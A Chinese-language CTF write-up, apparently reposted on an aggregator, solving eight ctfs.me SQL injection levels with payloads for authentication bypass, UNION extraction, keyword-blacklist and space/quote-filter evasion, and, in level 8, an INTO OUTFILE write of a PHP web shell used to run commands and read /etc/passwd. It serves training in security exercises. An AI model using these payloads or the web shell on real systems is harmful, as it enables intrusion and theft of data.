2. 程式人生 > >sql註入習題/ctfs.me sql injection

sql註入習題/ctfs.me sql injection

阿新 發佈:2018-02-16
tro 沒有 mat ike 密碼 還原 rod space sset

sql註入習題

來源於ctfs.me的一道習題,實在做不出來,google了wp,發現這道題目是引自於其他習題集了,而且原題目是有源碼的。。。於是趁機把他的題目做了一遍

level1

這道題目其實沒有源碼也是可以做的,不過需要簡單思考一下
$query = "SELECT * FROM secrets WHERE session_id = ‘" . $_POST[‘session_id‘] . "‘";
這個語句,我們需要讓where 後面的為true,所以我們需要用到or,比較簡單的題目
payload:1‘ or 1=1 #
在get your secrets裏面輸入,就可以得到所有的secrets,第一個就是flag

level2

這道題目在ctfs.me上很坑,我不曉得大佬是怎麽做的。
假如不給源碼,我首先想到的是萬能密碼登陸,一頓操作之後,發現註入點在用戶名的位置登陸不了,gg
換思路,考慮這個登陸的回顯
payload:username:1‘order by 1# &password=dd
回顯: username/password is invalid
payload:`username:1‘order by 2# &password=dd‘
回顯: invalid sql query

可以知道只有一列,所以我們可以看看回顯的位置
payload: username=1‘ union select 1 -- -&password=dd


回顯。。。,回顯出flag了,但是頁面顯示的不是真正的,查看源碼發現另一個flag,get!

假如給了源碼,那就稍微簡單一點了

if (isset($_POST[‘username‘]) && isset($_POST[‘password‘])) {

    // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we‘re cool.
 
    $query = "SELECT username FROM users where username = ‘" . $_POST[‘username‘] . "‘ and password = ?";

    // We use prepared statements, it must be secure.

直接構造payload:username=1‘union select flag from my_secret_table

level3 - The Blacklist Saga (Part 1)

$filter = array(‘union‘, ‘select‘);

    // Remove all banned characters
    foreach ($filter as $banned) {
        $_GET[‘q‘] = preg_replace(‘/‘ . $banned . ‘/i‘, ‘‘, $_GET[‘q‘]);
    }

過濾union 和select 關鍵字,使用preg_replace替換掉union和select關鍵字,而且不區分大小寫("/i")
以前經常看到這種繞過方式uni/**/on,這次嘗試無效。。。
但是因為替換關鍵詞為空字符,所以可以構造這種uniunionon,preg_replace把字符串中間的union替換為空白,其余字符再次組合成為union
payload:1‘uniunionon seleselectct 1,username,password from users #
簡單過程:

  1. 使用order by 測列數 1‘order by 3#
  2. 然後利用information_schema庫查表名,列名,就可以了

得到flag

Level 4 - The Blacklist Saga (Part 2)

 $filter = array(‘UNION‘, ‘SELECT‘);

    // Remove all banned characters
    foreach ($filter as $banned) {
        if (strpos($_GET[‘q‘], $banned) !== false) die("Hacker detected"); 
        if (strpos($_GET[‘q‘], strtolower($banned)) !== false) die("Hacker detected"); 
    }

比較黑名單的大寫形式,小寫形式,但是漏了大小寫混合,所以可以使用大小混合繞過
payload:1‘uNion Select 1,username,password from users #

Level 5 - The Blacklist Saga (Part 3)

// Ban space character
    if (strpos($_GET[‘q‘], " ") !== false) die("Hacker detected");

過濾了空格,空格繞過,使用mysql的註釋/**/
payload:1‘union/**/select/**/1,username,password/**/from/**/users/**/#

Level 6 - The Blacklist Saga (Part 4)

// Ban space character
    if (strpos($_GET[‘q‘], "‘") !== false) die("Hacker detected"); 
    if (strpos($_GET[‘q‘], ‘"‘) !== false) die("Hacker detected");

過濾單引號和雙引號,繞不過,但是可以通過原來的sql語句構造
$query = "SELECT * FROM search_engine WHERE title LIKE ‘" . $_GET[‘q‘]. "‘ OR description LIKE ‘" . $_GET[‘q‘] . "‘ OR link LIKE ‘" . $_GET[‘q‘] . "‘;";
payload: and 0 union select 1,username,password from users #\
具體:
select * from search_engine where title like ‘and 0 union select 1,username,password from users #\‘ or description like ‘and 0 union select 1,username,password from users #\‘ or link like ‘and 0 union select 1,username,password from users #\‘;
可以看到一共有6個單引號,但是由於‘\‘的作用,所以第二個,第四個,第六個單引號被轉義了,用SQL代理and 0 union select 1,username,password from users #\,結果如下:
select * from search_engine where title like ‘SQL \‘ or description like ‘SQL \‘ or link like ‘SQL\‘
去掉轉義的單引號
select * from search_engine where title like ‘SQL or description like ‘SQL or link like ‘SQL
還原SQL,因為title like 後面的參數SQL or description like‘是一個字符串,所以SQL不用還原,而且SQL最後面是一個註釋符號,所以上面語句中第二個SQL後面被註釋,可以省略select * from search_engine where title like ‘SQL or description likeand 0 union select 1,username,password from users #
再簡化一下:
select * from search_engine where title like ‘xxxx‘ and 0 union select 1,username,password from users #
ok

Level 7

先做level 8

Level 8 - The Final Challenge

查看源碼,發現有兩個隱藏表單

<!--<li><a href="/uploads/">Our files</a></li>-->
<!--<li><a href="/phpinfo.php">Debug</a></li>-->

可以知道允許上傳的文件在uploads裏面,
查看phpinfoDOCUMENT_ROOT /var/www/html,知道網站地址是這個,所以我們可以是用sql的into outifle 把php一句話,輸出到php文件中
payload:1 union select "<?php system($_GET[\"cmd\"]);?> ", "" into outfile "/var/www/html/uploads/temp2.php"#

35.184.20.243:8003/uploads/temp2.php?cmd=ls
查看系統文件,flag在上一級目錄裏面,使用cat讀取就可以了

leve7

使用level8的shell cat /etc/passwd得到flag,或者查看level7的flag.php源文件就可以得到flag
但是我覺得這可能有點問題,可能有其他的做法,還沒有想到

sql註入習題/ctfs.me sql injection

相關推薦

sql習題/ctfs.me sql injection

tro 沒有 mat ike 密碼 還原 rod space sset sql註入習題 來源於ctfs.me的一道習題,實在做不出來,google了wp,發現這道題目是引自於其他習題集了,而且原題目是有源碼的。。。於是趁機把他的題目做了一遍 level1 這道題目其實沒有源

【jSQL-injection】Java自動化SQL測試工具—jSQL Injection v0.81

could 直接下載 err pro depend v0.8 eat 1.3 jar包 jsql-injection是Kali集成的一款使用java開發的Web滲透測試工具。最初該工具主要實施SQL註入,後來增加管理頁面暴力掃描、敏感文件猜測、Web shell、SQL s

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

PDO防止SQL具體介紹

取代 能夠 article 數據庫 bsp 什麽 幫助 用戶 機會 <span style="font-size:18px;"><?php $dbh = new PDO("mysql:host=localhost; dbname=demo", "use

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【EF框架】使用params參數傳值防止SQL報錯處理

collect oar mapping cnblogs ken datetime nbsp .com src 通過SqlParameter傳時間參數,代碼如下: var param = new List<SqlParamete

另一種的SQL和DNS結合的技巧

其中 where ets 鏈接 是我 例如 .com bar 導致 這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。 本文章是理解於:http://netsecurity.51cto.com/art/2015

SQL1

put com mysq secure name 字符 html mit rom <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] &

mysql防SQL搜集

prepare case when sch pass 字符 ble 失敗 sqli 16進制 SQL註入 例:腳本邏輯 $sql = “SELECT * FROM user WHERE userid = $_GET[userid] “; 案例1:SELECT * F

Python防止sql

pan lec posit printf osi sqli jet usr operation 看了網上文章,說的都挺好的,給cursor.execute傳遞格式串和參數,就能防止註入,但是我寫了代碼,卻死活跑不通,懷疑自己用了一個假的python 最後,發現原因可能是

SQL之SQLmap入門

訪問控制 ret 當前 輸入 手動 ati 取數據 shc 3.2 http://www.freebuf.com/articles/web/29942.html 簡介 許多現實中對於網站的攻擊往往是由於網站沒有及時更新或者對於用戶的輸入沒有進行檢查。從緩沖區溢出

防止sql的函數addslashes()

php null str ges 定義 echo pre 註入 之前 1 <?php 2 $str = addslashes(‘Shanghai is the "biggest" city in China.‘); 3 echo($str); 4 ?> 定義

sqltips

註釋 ctf log 攔截 技術分享 執行 框架 哪裏 師傅 轉自http://www.wupco.cn/?p=3764 cuit 首先Web300 山水集團 第一步找到加密接口搭代理就不說了 接下來是註入,filter如下 這裏主要的難點在於如何按字節拆解返回的值,以完

ADO.NET 占位符(防SQL 攻擊)

microsoft 維護 text conn 提前 輸入密碼 sql 密碼 ati 當在添加程序中註入攻擊時在控制臺應用程序中可以這樣寫: 請輸入編號:U006 請輸入用戶名:無敵 請輸入密碼:1234 請輸入昵稱:呵呵 請輸入性別:True 請輸入生日:2000-1-1

記一次dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

sql代碼解釋

6666某個網站的登錄驗證的SQL查詢代碼為:1strSQL = "SELECT * FROM users WHERE (name = ‘" + userName + "‘) and (pw = ‘"+ passWord +"‘);" 惡意填入2userName = "1‘ OR ‘1‘=‘1";與3pass

sql過程中後臺數據庫類型的三種判斷方式

sql註入 安全測試 數據庫類型判斷 後臺數據庫類型判斷:一、通過頁面返回的報錯信息,一般情況下頁面報錯會顯示是什麽數據庫類型,在此不多說;二、通過各個數據庫特有的數據表來判斷: 1、mssql數據庫 http://127.0.0.1/test.php?id=1 and (sele